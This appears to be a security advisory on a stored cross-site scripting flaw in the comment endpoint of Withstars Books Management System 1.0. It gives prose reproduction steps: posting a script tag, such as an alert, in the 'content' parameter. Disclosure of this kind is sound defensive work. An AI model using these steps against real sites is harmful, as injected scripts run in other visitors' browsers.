Withstars Books Management System Cross-Site Scripting Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in Withstars Books Management System version 1.0. This issue arises in the Comment Handler component, specifically within the '/api/comment/add' endpoint. The vulnerability allows remote attackers to inject malicious JavaScript into the 'content' parameter, which is then executed when other users view the affected page. This XSS vulnerability is stored, meaning the injected script runs automatically without user interaction.

Impact

Exploitation of this vulnerability allows for stored cross-site scripting, where injected scripts are executed in the context of the user viewing the comments.

Reproduction

To reproduce this vulnerability, send a POST request to the '/api/comment/add' endpoint with a 'content' parameter containing the malicious JavaScript, such as a script tag including JavaScript code, such as an alert. Include 'name', 'email', and 'articleId' parameters as well. Once the comment is posted, the injected script will execute when the article is viewed.